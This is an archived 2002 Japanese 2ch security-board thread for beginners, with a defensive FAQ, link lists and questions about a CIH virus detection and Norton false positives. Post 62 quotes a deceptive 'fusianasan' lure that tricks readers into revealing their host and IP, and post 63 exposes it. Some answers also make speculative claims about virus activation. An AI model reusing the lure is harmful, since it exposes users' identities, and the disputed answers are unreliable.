初心者質問スレッドpart18

このエントリーをはてなブックマークに追加
1>>1-20をよく読みましょう
セキュリティ関係で、どこに質問したら良いかわからない人は こちらにどうぞ。
セキュリティに関係あるかよく分からない場合は、
まずパソコン初心者@2ch掲示板http://pc.2ch.net/pcqa/で質問してください
2ちゃんねるの仕様に関することはhttp://cocoa.2ch.net/qa/で

質問するときは状況説明は詳しく書きましょう

関連リンク>>1-20
各種ファイヤーウォール ログ解析ツール スパイ発見 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報
関連スレ・関連板は その他 など
ずれていたら>>1-50参照

[Ctrl]キーか[コマンド]キーと[F]キーを同時に押すとページ内検索が出来ます
過去スレや関連スレの過去ログ等を調べてから質問してください
2chスレッド検索http://www.ruitomo.com/~gulab/k.html

同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
どの板でも回答をもらえなくなってしまうので、書き込んでせめて1日程度はお待ちください。
お急ぎなら検索が早いかも? → http://www.google.co.jp/
2名無しさん@お腹いっぱい。:02/12/05 10:52
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/parser/mainpage.php?id=204&lg=1
Tiny Personal Firewall http://www.tinysoftware.com/
Agnitum Outpost http://www.agnitum.com/download/outpostfree.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/
【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.de/downloads.html
【日本語パッチ 等】
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
Agnitum Outpost(日本語で使用可能)
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
【セキュリティ チェックサイト】
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
[無料FW]
ZoneAlarm Part9 http://pc.2ch.net/test/read.cgi/sec/1035688068/l50
Kerio Personal Firewall Rule 5 http://pc.2ch.net/test/read.cgi/sec/1037321053/l50
Agnitum Outpost Firewall Part4 http://pc.2ch.net/test/read.cgi/sec/1037724848/l50
_■■■BlackICEスレ 2■■■_ http://pc.2ch.net/test/read.cgi/sec/1012458984/l50
SygatePersonalFireWall part3 http://pc.2ch.net/test/read.cgi/sec/1028486449/l50
[有料FW&AV]
【ノートン】インターネットセキュリティ Ver.17【2003】http://pc.2ch.net/test/read.cgi/sec/1038736975/l50
【不具合】ウイルスバスター2003Part4【報告書】 http://pc.2ch.net/test/read.cgi/sec/1037822358/l50
がんばれマカフィーPART2 http://pc.2ch.net/test/read.cgi/sec/1036507506/l50
[無料AV]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/sec/kako/1015/10155/1015584020.html
無料ウィルス用ソフトAVP/AVG/Ad簡(その2http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version5 http://pc.2ch.net/test/read.cgi/sec/1037948222/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
[その他]
☆ウィルス情報&質問 総合スレッド☆part7 http://pc.2ch.net/test/read.cgi/sec/1035401865/l50
スパイウェア発見専用ソフト「Ad-aware」 Part4 http://pc.2ch.net/test/read.cgi/sec/1037550190/l50
最強のファイアーウォールソフトって何かな?http://pc.2ch.net/test/read.cgi/sec/988724444/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
[Windows板] 広告カットとファイヤーウォールソフ ト。http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2http://salad.2ch.net/pc/kako/980/ 980600110.html
[初級ネット板] 簡易ファイアーオールhttp://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc.2ch.net/hack/
windows@2ch掲示板 http://pc3.2ch.net/win/
ソフトウェア http://pc3.2ch.net/software/
ダウンロードソフト(download板) http://tmp.2ch.net/download/
パソコン一般@2ch掲示板 http://pc3.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイトダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOpera(オペラ)を使用するという手段があることも念頭にいれてお いてください
http://home.netscape.com/ja/
http://www.jp.opera.com/
●セキュ板 雑談スレッド●[5] http://pc.2ch.net/test/read.cgi/sec/1029481542/l50
●セキュ板 雑談スレッド●[4] http://pc.2ch.net/test/read.cgi/sec/1013427349/
○ネットセキュリティー板 質問、雑談スレッド[3]○http://pc.2ch.net/test/read.cgi/sec/1006859839/
ネットセキュリティー板 質問、雑談スレッド[2]http://pc.2ch.net/sec/kako/999/999405173.html
ネットセキュリティー板 質問、雑談スレッドhttp://ton.2ch.net/sec/kako/988/988707245.html
セキュリティ板自治議論スレッド http://pc.2ch.net/test/read.cgi/sec/1035466949/l50
ファイアーウォールソフト 総合スレッド Part3 http://pc.2ch.net/test/read.cgi/sec/1016238340/l50
ファイアーウォールソフト 総合スレッド Part2 http://pc.2ch.net/test/read.cgi/sec/991646115/
ファイアーウォールソフト 総合スレッドhttp://yasai.2ch.net/win/kako/990/990201178.html
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法 http://pc.2ch.net/test/read.cgi/sec/ 1021363841/l50

DoorStop Firewall (Mac用) http://www.opendoor.com/
ZoneAlarm http://www.zonelabs.com/zap26_za_grid.html
Sygate Personal Firewall http://soho.sygate.com/products/shield_ov.htm
Tiny Personal Firewall (2.0.15Aはフリー、3.0はシェア) http://www.tinysoftware.com/
Kerio Personal Firewall 日本語化パッチ http://page.freett.com/nanasisan242/
Tiny Personal Firewall 日本語化パッチ (2.0.15Aまで)http://www.geocities.co.jp/SiliconValley-Cupertino/ 2943/
【お約束】
○ウィルスやブラクラのリンクを張るときは・・・
 他の方が誤ってクリックしても問題ないよう、直リンは避けてください。
○アダルトサイトに行くときは・・・
 インターネットオプション → セキュリティ→インターネット → レベルのカスタマイズ
 → ActiveX、JAVA、スクリプトを全て無効にしてください。
○怪しいリンクを踏むときは・・・
view-source://URLでソースを表示して判断してください。Javaスクリプトなどは実行されません。
○リンク先を直接見るときは・・・
「対象をファイルに保存」して一旦ファイルにし、メモ帳で一度開いてください。
○メールチェックをしたら、怪しいメールが届いていました・・・
開かずに捨ててください。捨てようとしてクリックした時に感染する恐れがありますので、
Outlook Expressのプレビュー機能を必ずオフにしてから削除してください。
○IE4.0、IE5.0、IE5.5を使用しています・・・
IE4.0は今後不具合が発見されてもフォローされません。IE5.5SP2かIE6.0SP1に乗り換えてください。
 IE5.0、5.5の方はSP2にアップデートの後、各種パッチを当ててください。
○ウィルス対策ソフトを入れていますが・・・
 パターンファイル(ウィルス定義ファイル)を更新していなければ意味がありません。
 感染する前に定期的にチェックしましょう。
【FAQ他】
【IE&OE】
○Outlook Expressのプレビューをオフにするには・・・
 OEのメニューバーにある「表示」→「レイアウト」→「プレビューウィンドウを表示する」
 のチェックを外してください。
○メーラーにOEを使っていませんのでウィルスメールを開いても、自動的に実行したりしませんよね・・・
 メーラーがOEでなくても、IEコンポーネントを利用してHTMLメールを表示する場合は、
 IE、OEの不具合を引き継ぐことになります。ですので、自動的に実行しないとは言い切れません。
 OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法 http://pc.2ch.net/test/read.cgi/sec/ 1021363841/
 OE6の場合はIE6SP1を適用してHTMLメールをテキスト形式で表示にすることが出来ます。
 http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
 http://www.ipa.go.jp/security/txt/2002_10.html
○アダルトサイト閲覧中に突然ファイルをDLして、デスクトップにアイコンが出来てしまいました・・・
 アイコンのプロパティからリンク先を表示で出てきたファイルをアイコンとともに削除してください。
 MS-DOSプロンプトを起動して、msconfigで見慣れないものを削除してください。
 C:\windows\Downloaded Program Files\にあるファイルを削除してください。
 MS-DOSプロンプトを起動して、scanreg /restoreも効果的です。
 エロサイト見たら・・・助けてください!Part8 http://pc.2ch.net/test/read.cgi/pcqa/1038097140/l50
○いつの間にかInternet Explorerのスタートページと検索のページが書き換えられていました・・・
 ウィルス対策ソフトを試してみて、Trojan.JS.Offensiveならインターネットオプションから再設定してください。
【IPアドレス】
○IPアドレスを見るにはどうすれば・・・
 自分のIPアドレスを見るにはMS-DOSプロンプトを起動して、winipcfg(9x系)か
 ipconfig /all(NT系)を実行してください。
他人のIPアドレスを見るにはMS-DOSプロンプトを起動して、netstat -anを実行してポートから判断してください。
○IPアドレスから個人情報が抜かれたり・・・
 プロバイダがもっている情報は公権力が無い限り、外部に公開することは無いと信じてください。
 それよりも、コンピューター上のファイルなどから判断することの方が容易かもしれません。
○IPアドレスから利用しているプロバイダを知りたいのですが・・・
 >>2-5の【Whois】を利用してください。
 なお、スレに結果を貼りつけても事態は進展しません。

【掲示板】
○掲示板が荒らされて困っています・・・
注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖
冷静に判断、選択し、対応してください。困っているのは貴方だけではあ
りません。
○掲示板の利用者のIPアドレスは抜けますか・・・
HTMLソースに書いてあることもありますが
【ウィルス】
○Macを使ってますが、Windowsのウィルスに感染しますか・・・
 WindowsのアプリケーションがMacで利用できないように、WindowsのウィルスはWindowsのプログラムなので実行できず、
 感染はしません。
○ウィルスに感染しましたが、ウィルス対策ソフトを持っていません・・・
 ワームに感染した時は可能ならば、Firewallで予めメールを拡散しないようにアウトバウンド、
 リモートポート25を止めてみてください。但し、その間メールの送信は出来ません。
 ActiveXを有効にした上で、オンラインウィルススキャン
 http://www.trendmicro.co.jp/hcall/index.aspを試してみてください
○ファイアーウォールがトロイのアクセスをブロックしました、感染しているんですか・・・
 バックドアツールによって通常開かれるポートへのアクセスをファイアーウォールがトロイと表示することがあります。
 アウトバウンドで検出された時は感染している可能性が高いです。
 インバウンドで検出された時は感染している可能性は低いですが、念のためチェックをしてください。
○ウィルス対策ソフトの「駆除」、「隔離、検疫」、「削除」の違いは・・・
 「駆除」はファイルからウィルスを取り除くことです。但し、常に完全というわけでもないようです。
 「隔離、検疫」はファイルをリネーム、移動したり、データを欠落させて実行できないようにします。
 「削除」はファイル自体を削除してしまいます。ワーム本体は通常、削除されます。
○webメールのアドレスにウィルスメールが届きましたが、開いても感染しませんよね・・・
 webメールサービスやウィルスによるので一概には答えられません。
 また、添付ファイルを実行してしまった時は感染したと思って間違いないでしょう。
 hotmailはウィルスを検査していますが、新種のウィルス相手には無力です。
○ウィルスらしきメールを受け取ったのですが、添付ファイルがありません・・・
 ゲートウェイ型のウィルス対策ソフトでウィルス本体が削除されたか、ウィルスの機能が不完全で
 ファイルを添付する能力を失ったなど様々ですが、開かずに捨てるのが懸命です。
○「jdbgmgr.exeがウィルスだ」というのはデマです。削除してしまわないように。
 http://www.ipa.go.jp/security/topics/alert140515.html参照
11名無しさん@お腹いっぱい。:02/12/05 11:11
>>1スレたてお疲れ様です。

さっそくですが質問させてください。
OSはwin98se、ブラウザはie6です。
昨晩マイクロソフトのページでウィンドウズアップデート
をかけているとノートンがウィルスの警告をしてきました。
そのままノートンを操作して問題のファイルを削除
してしまったのでウィルス名はわからないのですが、
感染していたファイルはC:\WINDOWS\JAVA\CLASSESにありました。
確かMLなんとか.zipだったと思います。

今朝、心配だったのでノートンでウィルススキャンしてみると
ぜんぜん違う場所にあるkissld.exe(着せ替え遊びのソフト)
というファイルがW95.CHI.remenanthに感染しているという
結果がでました。
このファイルは1年以上前に入手したもので今まで何回もスキャン
しても感染という結果はでた事はありません。
昨晩のアップデートと関係があるのでしょうか?
なにかわかる方、よろしくお願いします。
くだらねぇ質問はここに書き込め Ver2.21 http://pc.2ch.net/test/read.cgi/sec/1038379526/
くだらねぇ質問はここに書き込め Ver2.23 http://pc.2ch.net/test/read.cgi/sec/1036424529/
(↑最近のものはVerが混乱している)
くだらねぇ質問はここに書き込め Ver2.23 http://pc.2ch.net/test/read.cgi/sec/1034587921/
くだらねぇ質問はここに書き込め Ver2.22 http://pc.2ch.net/test/read.cgi/sec/1034587921/
くだらねぇ質問はここに書き込め Ver2.21 http://pc.2ch.net/test/read.cgi/sec/1033088231/
くだらねぇ質問はここに書き込め ver2.20 http://pc.2ch.net/test/read.cgi/sec/1030600616/
くだらねぇ質問はここに書き込め ver2.19 http://pc.2ch.net/test/read.cgi/sec/1028559356/
くだらねぇ質問はここに書き込め Ver2.18 http://pc.2ch.net/test/read.cgi/sec/1026717316/
くだらねぇ質問はここに書き込め Ver2.17 http://pc.2ch.net/test/read.cgi/sec/1024963492/
くだらねぇ質問はここに書き込め Ver2.16 http://pc.2ch.net/test/read.cgi/sec/1021270127/
くだらねぇ質問はここに書き込め Ver2.15 http://pc.2ch.net/test/read.cgi/sec/1017903445/
くだらねぇ質問はここに書き込め Ver2.14 http://pc.2ch.net/test/read.cgi/sec/1014116411/
くだらねぇ質問はここに書き込め Ver2.13 http://pc.2ch.net/test/read.cgi/sec/1009795619/
くだらねぇ質問はここに書き込め Ver212 http://pc.2ch.net/sec/kako/1002/10021/1002134745.html
こんな真昼間にスレ立てしてる>>1を愛してあげたい
>>1 乙〜
16名無しさん@お腹いっぱい。:02/12/05 12:06
携帯からでもスクリプトとか組んだら結構面白いこと出来ますか?
ドコモですが
携帯でもってスクリプトファイル書いてたら気が狂うに8000ワレメ
1916:02/12/05 12:26
>>17
愛も−ど用なので見れません >>18
書くのはピ-シ-でいいや
こちらを使いきってね
質問者の皆さん↓にどうぞ

初心者質問スレッドpart17
http://pc.2ch.net/test/read.cgi/sec/1037350545/
2116:02/12/05 12:28
理論的には出来るの?出来ないの?
>>20使い切ったら落ちるし
こんな過疎板じゃ落ちたらHTML化するまで何ヶ月かかるかわかんないから
拒否します

>>19死ね
>>16はネトラン厨房
2419:02/12/05 12:35
>>22
何だよ
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。


まぁ>>16>>19>>24はネットランナーでも読んでオナニーしてなさいってことだ
2616:02/12/05 12:38
携帯でもスクリプト発動するの?
ジャバとかなら愛アプリ作ってるぐらいだから出来るかな?
さて、ブラウザの仕様も調べられないゴミはほっといて
次の質問者の方どうぞ
2816:02/12/05 12:44
携帯ってブラウザなんなの?
これぐらい教えてよ
2911:02/12/05 12:45
もうテンプレ書き終わったと思って>>11に質問書いてしまいました。
なんかスルーされちゃってるみたいなんですが、もう一回書いたほうが
いいでしょうか?
>>28
調べろ。

はい、次の方どーぞ。
>>29
関係はあるかもしれないし、ないかもしれない。
そんなことは分からない。
取り敢えず、引っかかったら検疫しとけ。
>>11
W95.CHI・チェルノブイリ・ウィルスは潜伏性があるので今までのウィルス
スキャンで発見できなかっただけかもしれません。それがウィンドウズアップ
デートをきっかけに活動を始めたのだと思います。
それから、ノートンを使った事がないのでわかりませんがノートンのフォルダに
ログファイルはありませんか?常駐タイプのウィルス対策ソフトにはログ
ファイルのあるものも多いと思います。探されたらどうでしょうか?
尚、チェルノブイリ・ウィルスは非常に凶悪だそうですので、それ以外に
感染ファイルがないかvectorでアンチドートをダウンロードしてチェック
される事を進めます。(必ず、「コード解析」だけでなく「圧縮ファイル」と
「メール確認」にもチェック入れてください。)
http://www.vector.co.jp/soft/win95/util/se108623.html
それから、いつまた、再発するかわからないのでバックアップはこまめに
されるよう勧めます。
3316:02/12/05 12:51
>>30
そんなの調べられないよ
>>29
Chernobyl関連だとするなら詳しい人を待った方がいいかもね

あ、あと「彼」には注意しろよ
>>32
荒らしは氏ね
「彼」FAQ Ver0.0

Q1 「彼」って誰ですか?
A1 セキュ板に2002/11頃から現れた、困ったチャンです。

Q2 どのように困ったチャンなのでしょうか?
A2 回答は的外れの場合が多い。しかし、口調は丁寧かつ親切、それで
いて妙な自信が感じられるので質問した初心者が騙されてしまいます。

Q3 住人はどう対応しているのですか?
A3 基本的には放置です。しかし初心者を騙している時はしょうがなく叩きます。

Q4 「彼」を発見しました。どうすればよいですか?
A4 基本的には放置です。初心者が騙されそうになっている時はその人が騙されない
ようにする事を優先してください。
http://pc.2ch.net/test/read.cgi/sec/1037350545/958
>>34 >>35
ヤブ公もうざいが、ヤシの粘着の焼く立たずイムポは余計にウザイ。

       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       |  それを踏まえて次から何事もなかったかのようにどうぞ。
   ∧ ∧ |/\___________________
   (,,゚Д゚)____.
   (つ/~ ※ ※ \
   /※ ※ ※ ※ \
3911:02/12/05 14:34
>>34>>35>>38
>>32の人が言ってる事は間違ってるということでしょうか?
ちなみにノートンの活動ログを調べてみると
ウインドウズアップデート中にノートンが反応して削除したファイルは
C:\WINDOWS\JAVA\CLASSES\xmldso.cabでした。
>>39まぁ

>W95.CHI・チェルノブイリ・ウィルスは潜伏性があるので今までのウィルス
>スキャンで発見できなかっただけかもしれません。それがウィンドウズアップ
>デートをきっかけに活動を始めたのだと思います。

チェルノブイリに潜伏性があるのは確かだが、WindowsUpdate云々は確証がないわな

つか W95.CHI.remenanthじゃなくってW95.CHI.remnantsじゃない?
英語サイトのSymantecのウィルス辞典には載ってるみたいだが
それ以上の面倒は見切れないよん
あと破壊活動まで潜伏するんであって
スキャンすりゃ見つかるだろ
4211:02/12/05 14:56
>>40
ありがとうございます。
>W95.CHI.remnantsじゃない?
すんません、そうでした。
Symantecの日本語のページにはW95.CHIの解説はあったのですが
W95.CHI.remnantsに関してはウィルス定義にアップデートデータ
しかありませんでした。
教えていただいた英語のサイトに行って日本語に翻訳してみます。
ちなみに感染していたkissld.exeの作成日時は2000年1月27日でした。
なんでいままでスキャンにひっかからなかったのだろう?
remnants=残りくず
誤検出かしらん
4411:02/12/05 15:08
>>43
そのような意味のようですね。
Symantecの英語サイトの解説文を和訳ツールで訳してみました。

W95.CIH.remnants次のものの上で発見されました:2002年11月21日最後に、
次のものの上で更新されました:2002年11月27日午後11:04:30W95.CIH.remnantsは
特に実行可能なファイルのW95.CIHの残りを発見するために作成された検知です。
たとえウィルス・コードが実行されなくても、ファイルはまだウィルスの残りを
含んでいます。
これは、正常なようにウィルスがファイルにいるが、ファイルが走る場合を含んで
います。
これらの場合では、ウィルスが全く実行しません。
しかしながら、ウィルスがファイルにいるので、それは検知されるべきです。
また、ウイルスの身体が削除されるべきです。シマンテックは、
ロータス・ノーツ・ソフトウェアのいくつかの営利上利用可能なバージョンで
W95.CIHが送られるこれらの残りを含んでいるファイルに気づいています。
注:2002年11月21日に先立った定義はW95.CIH.corruptとしてこれらの残りを
検知するでしょう。
4511:02/12/05 15:12
さらにxmldso.cabについても検索してみたのですが
http://support.microsoft.com/default.aspx?scid=kb;ja;JP416076
このような記事が出てきました。
だけど私のOSはwin98seですし、知人で同じosでアップデートかけてもらって
試したのですがC:\WINDOWS\JAVA\CLASSESにxmldso.cabは入ってこなかった
みたいです。
46名無しさん@不安でお腹いっぱい。:02/12/05 15:19
こんにちは。
初めてココに書き込ませていただきます。

実はUS版yahooのyahoo moviesを覗いていたところ、突然ポップアップで
警告文が表示されました。

見出しは「protect yourself!」で、内容は
did you know?
your computer is recording the following:
websites visited-chat sessions-all pictures viewed-pop-ups loaded
your credit card info-all your activities can be tracked from anywhere
this could be your last chance to protect yourself

click here to permanently erase your tracks!(←この部分は、早く押せと言
わんばかりに赤く点滅)
+++++++++++++++++++++++++++++++++
ご存じですか。あなたのコンピューターは下記を記録しています:

あなたのクレジットカード情報、あなたの活動は、すべていかなる場所からも
追跡することができます。
これはあなた自身を保護するあなたの最後の機会でありえます。

永久にあなたの軌跡を削除するためにここをクリックしてください!(赤点滅)
+++++++++++++++++++++++++++++++++++
と、こんなコトが書かれているようなのですが、写真等閲覧していただけなので何のことか
判らず勿論クリックもせずに、ただ消してしまったのですが何だか気になって・・・。

コレって一体何だったのでしょうか?(どうもyahooからの警告のようには
思えなかったのですが・・・)
もし、ご存じの方居られましたらどうかよろしく御願いいたします。
47☆☆☆☆☆:02/12/05 15:20
>>46 これじゃないの↓
WEBPOPUPからメッセージをもらったひと
http://pc.2ch.net/test/read.cgi/sec/1035271935/l50
4911:02/12/05 15:29
書き忘れたのですがW95.CIH.remnantsに関しては
>>44にあるとうり2002年11月27日に検知できるようになった
ということで解決ですね。
xmldso.cabのほうがよくわかりません。
>>46
これ↓です。
http://pc.2ch.net/test/read.cgi/sec/1035081358/l50

>>48
似てるけど違います。
51よっ!:02/12/05 15:35
良くサーバーとかで暗号化しないとアクセス出来なかったりしますが
それを個人PCで実現することは可能でしょうか?
それによってセキュリティが高まる気がするのですが・・・
>>11
ウィルスがあっても単離状態でないとウィルス対策ソフトが反応しない事が
あります。
たとえば、ウィルス対策ソフトでパソコン全体をスキャンしてもKlezや
Badtrans Bのような有名なウィルスでも添付メールがOEのメールフォルダに
ある場合反応しないのが多いです。
ただし、私が>>32で紹介したアンチドートはOEのメールフォルダにあっても
反応します。
5440:02/12/05 15:53
また今日は全開だねw
セキュ板の皆さんご愁傷様
56よっ!:02/12/05 16:20
すいません。今後気を付けるので
教えて下さい
>>56

駄目な例
 ・名前、本文に「初心者」が入っている。
 ・2度目以降の書き込みに通し番号が入っていない。(主に捨てハン)
 ○環境・状況が書かれていない、または小出し。
 ・質問が1行。
 ◎日本語がおかしい。
 ・検索という言葉を知らない。

自分の文章をもう一度読み直して見ましょう。
第三者が読むと意味不明です。
58よっ!:02/12/05 16:27
>>55 今後マルチにならないように気を付けます。
では改めて質問をさせていただきます。
良くサーバーとかで暗号化しないとアクセス出来なかったりしますが
それを個人PCで実現することは可能でしょうか?
それによってセキュリティが高まる気がするのですが・・・


(;´Д`)ハァ…
>>58
ちょっと文章の意味がよく分かりません

・良くサーバーとかで暗号化しないとアクセス出来なかったりします
・それを個人PCで実現する

以上の二点が何を指しているのか分かりません
またこれが分かっても環境等が全く書かれていないので具体的な方法を示す事ができないと思われます。
(´-`).。oO(放置でいいんじゃない・・・)
62 :02/12/05 17:08

動画うpキタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!!!!!!!!

★☆★裏2ちゃんねる更新しますた
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入力します。
2.E-mail欄に、フェラ/ハメドリ/ザーメン/ゼンラ/ラブホテル+出身都道府県を"カタカナ"
  で明記して下さい。
3.本文にIDとパスワードの guest guest を入れて、書込みボタンを押します。
4.メッセージが「確認終了いたしました。ありがとうございます。」に変わればばOK
5.サーバーが重いと2chに戻ってくるけど、まあ30分以内であれば何回かやれば大丈夫。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
  都合上つながる確立が高いです。
 (注意!)全て半角で入力してください!!
       http://fusianasan.2ch.net/←は、管理者専用の為「直リン」で飛んでも
       「サーバーが見つかりません」になります。入り口は「表2ch」のCGIだけです。
       つまり、この掲示板から上記の操作を実行してください。
7.裏2ちゃんねるの内容については違法性、反社会的な内容を多く含んでおりますので
  ご自身で確認してください。サイトの内容についての質問はご遠慮願います。
8.裏はアクセス過多になりやすいので表から誘導すると向こうの住人が怒ります。

>>62
http://www.2ch.net/guide/faq.html#G5

>他の人のホスト名・IPを見ることはできませんが、自分のものを表示することはできます。
>名前欄に「fusianasan」といれるだけです。
>もしも間違ってこの方法他でホストが表示されたとしても、自己責任なので削除依頼には応じません。

リモートホストが表示される罠ですので、放置。
64http://mokorikomo.2ch.net/:02/12/05 18:23
 guest guest 
質問なんですが、アウトルックのアカウントの項目欄に
知らない間に自分以外の見知らぬアカウントが5つ程追加されていました。
削除したんですがメールにはまったく支障ありません。
誰かになんかされていたんでしょうか?

((((((;゚д゚))))))ガクガクブルブル
66 :02/12/05 21:33
>>65
そもそも家族とかが勝手にいじったりしてたりとかしてない?
67 :02/12/05 21:34
あ、日本語が変
>>66
家族は私以外パソコンなんて扱えないので
そんな事は絶対にありえません。
OSもXPで起動時にパスワードかけてるし…。
あやし〜サイトにも行った記憶がありません(w
>>65
ウイルス検索
送信済みメールフォルダの確認
最新パッチの適用
ぐらいはやった方が良いと思うけど?

なにやられたか知りたい時は、PFW入れて全ての通信のログを記録すると良いよ。
OutlookExpressや IEは使わないのがセキュリティ的に高いと思う。
意表突いてディレクトリサービスだ、に一票。
71cheshire-cat ◆PhCATJR.v6 :02/12/05 22:03
>>68
アカウント勝手に作成問題は、漏れわからんのですが。
homeなら、Safe Modeでしかお目にかかれない、Adminisitratorってアカウントは塞ぎますたか?

レス違いの話でスマソ。
セキュリティ対策何もしてないのですが一体何をされる可能性がありますか?
ウィルス埋め込まれるくらい何でもないことなので除外するとして、、
みんな何故セキュリティ対策はしたほうがいいよ!っていうのか理解できません
>>72
じゃあしなくていい
さいなら
>>72
(´ι _`  )・・・
ネットに繋げると、2〜3分おきにウイルスバスターが起動して
「NetBIOS Browsing」って出るのですが、ウイルスに感染してしまったのでしょうか?
>>75
ネタはよそで
>>11
えーっと、たとえば、フリーソフトなんかで時々DLLとか特定のバージョンの
ビジュアルベーシックとかのランタイムがなければ動かないのがありますよね。
さすがに有料ソフトではそういうの滅多にないでしょうけど。
で、何が言いたいかというと、ウィルスも一種のプログラムだからそういう
DLLとかランタイムとかがなければ動かない場合もあるという事です。
だからウィンドウズアップデートして不足してたDLLとかをダウンロードした
とたん休眠中のウィルスが活性化した可能性があるんじゃないのかなと
思います。それでウィンドウズアップデート中にノートンが警告発して
ファイルを削除したのかもしれません。
>77
具体例を挙げてみろよ。もちろん情報ソースもつけてな。
それができないならもうこの板、いや2ちゃんにくるな。
79 ◆awsTinysAA :02/12/06 09:57
>>77
kissld.exeに感染しただけ、じゃないの?
80名無しさん@お腹いっぱい。:02/12/06 10:02
age
わかり難いので訂正
>>77
kissld.exeが W95/CHI に感染しただけ、じゃないの ?

CIHは、ウイルスコードの本体を分割することができ、それを感染ファイルの非使用部分に、埋め込みます
http://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html
って書いてあるけど ?
82名無しさん@お腹いっぱい。:02/12/06 10:30
>>11
アァ、xmldso.cabはWin9X系のアップデートする際にも
ノートンはウイルスとして誤検出してしまう事は良くありますね〜。
気にしなくてよろしい。
ゴ ケ ン シ ュ ツ です。
又、xmldso.cab(OSアップデート)とW95/CHI は別問題と思われ。
>>81さんの通りkissld.exeが W95/CHI に感染しただけですナ。
アップデート時の誤検出…そういえばそんなこともあったねえ。
「マイクロソフトがウィルスに感染してる!」って騒いだのは誰だったか…
JP416076 - [NT] SP1 インストール時に Norton AntiVirus 2000 がウイルスを検出
http://support.microsoft.com/default.aspx?scid=kb;ja;JP416076
84名無しさん@お腹いっぱい。:02/12/06 11:13
ノートンいれたらヤホーのチャットでボイスができなくなってしまいました
TCPのせいらしいのですがどうやって設定を変更すればいいかわからず
困っています
そういやそんなことがあったなぁ
>>84
正規ユーザなら、サポートに聞け、まだ真昼間だろ。
87名無しさん@お腹いっぱい。:02/12/06 12:01
ノートンインターネットセキュリティーバージョンは3.0です。
FFFTPをインストールしたところ、すべてのwebサイトが表示できなくなりました。
慌ててアンインストールしましたが、直りませんでした。
セキュリティを無効にすれば直るのですが、
それでは意味が無いのでなんとかしたいです。
どなたか教えていただけないでしょうか?
OSは98です。よろしくお願いします。
88名無しさん@お腹いっぱい。:02/12/06 12:18
>>87 NIS再インストール。
89名無しさん@お腹いっぱい。:02/12/06 15:06
あの、質問です。
お昼ごはんを食べて帰ってきたら、見たことのない「メッセンジャ サービス」
という窓が開いていて、Fucking USA...とUSAさんから私のIPあてにメッセージ
が届いて(届いたように見えただけ?)ました。
ジョークソフトでこゆのあるんでしょうか? 
>>89見たことないっていっても、MSNとか入れっぱなしだろう?
>>89
たぶんこれだ
http://www.zdnet.co.jp/news/0210/19/nebt_09.html

つーかおまえ、使ってるOSくらい書けや。
windows messengerとMSN〜とヤフ〜が入ってるのですがアイコンの絵のとこが空で
